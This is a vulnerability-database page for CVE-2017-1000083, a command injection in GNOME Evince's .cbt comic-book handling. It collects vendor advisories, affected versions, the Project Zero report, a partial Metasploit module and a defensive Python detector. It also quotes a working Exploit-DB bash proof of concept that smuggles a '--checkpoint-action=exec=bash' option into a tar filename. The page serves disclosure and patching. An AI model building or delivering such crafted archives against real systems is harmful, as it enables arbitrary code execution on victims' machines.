CVE-2017-1000083
Published 2017-09-05
CVE-2017-1000083: backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt…
Severity: high, 7.8 (CVSS 3.0), vector AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename.
Affected
26 ranges, showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | atril | < atril 1.16.1-2.1 (bookworm) | atril 1.16.1-2.1 (bookworm) |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | evince | < atril 1.16.1-2.1 (bookworm) | atril 1.16.1-2.1 (bookworm) |
| gnome | evince | <= 3.24.0 | — |
| gnome | evince | >= 0 < 3.22.1-4 | 3.22.1-4 |
| gnome | evince | >= 0 < 3.22.1-4 | 3.22.1-4 |
| gnome | evince | >= 0 < 3.22.1-4 | 3.22.1-4 |
| gnome | evince | >= 0 < 3.22.1-4 | 3.22.1-4 |
| mate-desktop | atril | >= 0 < 1.16.1-2.1 | 1.16.1-2.1 |
| mate-desktop | atril | >= 0 < 1.16.1-2.1 | 1.16.1-2.1 |
| mate-desktop | atril | >= 0 < 1.16.1-2.1 | 1.16.1-2.1 |
| mate-desktop | atril | >= 0 < 1.16.1-2.1 | 1.16.1-2.1 |
| redhat | enterprise_linux_desktop | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server | — | — |
| redhat | enterprise_linux_server_aus | — | — |
| redhat | enterprise_linux_server_aus | — | — |
| redhat | enterprise_linux_server_eus | — | — |
| redhat | enterprise_linux_server_eus | — | — |
| redhat | enterprise_linux_server_eus | — | — |
| redhat | enterprise_linux_server_tus | — | — |
| redhat | enterprise_linux_server_tus | — | — |
CVSS provenance
nvd v3.0 7.8 HIGH CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
osv 7.8 HIGH
Ubuntu
Evince vulnerability
vendor_ubuntu·2017-07-13
CVE-2017-1000083 Evince vulnerability
Title: Evince vulnerability
Summary: Evince could be made to run programs as your login if it opened a
specially crafted file.
Felix Wilhelm discovered that Evince did not safely invoke tar when
handling tar comic book (cbt) files. An attacker could use this to
construct a malicious cbt comic book format file that, when opened
in Evince, executes arbitrary code. Please note that this update
disables support for cbt files in Evince.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
evince: command injection via filename in tar-compressed comics archive
vendor_redhat·2017-07-13·CVSS 7.8
CVE-2017-1000083 [HIGH] CWE-78 evince: command injection via filename in tar-compressed comics archive
It was found that evince did not properly sanitize the command line which is run to untar Comic Book Tar (CBT) files, thereby allowing command injection. A specially crafted CBT file, when opened by evince or evince-thumbnailer, could execute arbitrary commands in the context of the evince program.
Mitigation: - Disabling evince-thumbnailer to render icons will reduce the attack
Debian
CVE-2017-1000083: atril - backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince be...
vendor_debian·2017·CVSS 7.8
CVE-2017-1000083 [HIGH] CVE-2017-1000083: atril - backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince be...
Scope: local
bookworm: resolved (fixed in 1.16.1-2.1)
bullseye: resolved (fixed in 1.16.1-2.1)
forky: resolved (fixed in 1.16.1-2.1)
sid: resolved (fixed in 1.16.1-2.1)
trixie: resolved (fixed in 1.16.1-2.1)
GHSA
GHSA-c796-cmwx-5c79: backend/comics/comics-document
ghsa_unreviewed·2022-05-13
CVE-2017-1000083 [HIGH] GHSA-c796-cmwx-5c79: backend/comics/comics-document
OSV
CVE-2017-1000083: backend/comics/comics-document
osv·2017-09-05·CVSS 7.8
CVE-2017-1000083 [HIGH] CVE-2017-1000083: backend/comics/comics-document
No detection rules found.
Exploit-DB
Evince - CBT File Command Injection (Metasploit)
exploitdb·2019-02-11
CVE-2017-1000083 Evince - CBT File Command Injection (Metasploit)
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
class MetasploitModule 'Evince CBT File Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Evince
before version 3.24.1 when opening comic book `.cbt` files.
Some file manager software, such as Nautilus and Atril, may allow
automatic exploitation without user interaction due to thumbnailer
preview functionality.
Note that limited space is available for the payload ( MSF_LICENSE,
'Author' =>
[
'Felix Wilhelm', # Discovery
'Sebastian Krahmer', # PoC
'Matlink', # Exploit
'bcoles' # Metasploit
],
'References' =>
[
['BID', '99597'],
['C
```
Exploit-DB
Evince 3.24.0 - Command Injection
exploitdb·2018-11-13·CVSS 7.8
CVE-2017-1000083 [HIGH] Evince 3.24.0 - Command Injection
---
```bash
# Exploit Title: evince command line injection
# Date: 2017-09-05
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083
```
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083
```bash
#! /bin/bash
# define the payload
export PAYLOAD="firefox google.com"
# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg
# Run the malicious file
evince poc.cbt
```
Metasploit
Evince CBT File Command Injection
metasploit
This module exploits a command injection vulnerability in Evince before version 3.24.1 when opening comic book `.cbt` files. Some file manager software, such as Nautilus and Atril, may allow automatic exploitation without user interaction due to thumbnailer preview functionality. Note that limited space is available for the payload (<256 bytes). Reverse Bash and Reverse Netcat payloads should be sufficiently small. This module has been tested successfully on evince versions: 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6; 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.
Bugzilla
CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive [fedora-all]
bugzilla·2017-07-13·CVSS 7.8
CVE-2017-1000083 [HIGH] CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive [fedora-all]
Use the following template for the 'fedpkg update' request to submit an
update for this issue as it contains the top-level parent bug(s) as well as
this tracking bug. This will ensure that all associated bugs get updated
when new packages are pushed to stable.
```
# bugfix, security, enhancement, newpackage (required)
type=security
# testing, stable
request=testing
# Bug numbers: 1234,9876
bugs=1468488
# Description of your update
notes=Security fix for [PUT CVEs HERE]
# Enable request automation based on the stable/unstable karma thresholds
autokarma=True
stable_karma=3
unstable_karma=-3
# Automatically close bugs when this marked as stable
close_bugs=True
# Suggest that users res
```
Bugzilla
CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive
bugzilla·2017-07-07·CVSS 7.8
CVE-2017-1000083 [HIGH] CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive
Created attachment 1295228
0001-comics-Remove-support-for-tar-and-tar-like-commands.patch
From the folks at Project Zero:
"""
Hi,
The comic book backend in evince 3.24.0 is vulnerable to a command injection bug that can be used to execute arbitrary commands when a cbt file is opened:
cbt files are simple tar archives containing images. When a cbt file is processed, evince calls
"tar -xOf $archive $filename" for every image file in the archive:
```c
// backend/comics/comics-document.c: 914
command_line = g_strdup_printf ("%s %s %s",
                                comics_document->extract_command,
                                quoted_archive,
                                quoted_filename);
```
While both the archive name and the filename are quoted to not be interpreted by the shell,
the filenam
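The option-injection pattern described in the Project Zero report above, as an added defensive example that is not from this page, the Evince project or any of the quoted advisories: a Python check that lists the entries of a tar-format .cbt whose names GNU tar would parse as options rather than as member names, plus the argv form that keeps such a name positional. The sample archive is constructed inline (the "payload" is the no-op `true`); the `--` end-of-options separator is GNU tar behaviour, while the upstream fix itself removed tar support rather than hardening the command.

```python
import io
import tarfile


def build_sample_cbt():
    """Constructed sample .cbt (not from the page): one benign image entry and
    one entry whose name begins with "--", the pattern this CVE abuses."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("001.jpg", " --checkpoint-action=exec=true.jpg"):
            info = tarfile.TarInfo(name)
            data = b"\xff\xd8\xff" + b"\x00" * 64  # JPEG SOI marker plus padding
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def option_like_members(cbt_bytes):
    """Return member names that tar would treat as options if passed as a
    positional argument to 'tar -xOf archive name'.

    Shell quoting (g_shell_quote) does not help here: the name reaches tar
    intact, and tar itself interprets a leading '-' as an option. Leading
    whitespace is stripped before the check because the public PoC stores
    the name with a leading space.
    """
    flagged = []
    with tarfile.open(fileobj=io.BytesIO(cbt_bytes), mode="r:") as tar:
        for info in tar.getmembers():
            if info.name.lstrip().startswith("-"):
                flagged.append(info.name)
    return flagged


def safe_extract_argv(archive_path, member_name):
    """argv form of the extraction: no shell is involved, and "--" ends
    option parsing so a member name starting with "-" stays a file name."""
    return ["tar", "-xOf", archive_path, "--", member_name]


if __name__ == "__main__":
    sample = build_sample_cbt()
    for name in option_like_members(sample):
        print("option-like member name:", repr(name))
    print(safe_extract_argv("poc.cbt", "--checkpoint=1.jpg"))
```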
References:
- http://seclists.org/oss-sec/2017/q3/128
- http://www.debian.org/security/2017/dsa-3911
- http://www.securityfocus.com/bid/99597
- https://access.redhat.com/errata/RHSA-2017:2388
- https://bugzilla.gnome.org/show_bug.cgi?id=784630
- https://github.com/GNOME/evince/commit/717df38fd8509bf883b70d680c9b1b3cf36732ee
- https://www.exploit-db.com/exploits/45824/
- https://www.exploit-db.com/exploits/46341/
Published: 2017-09-05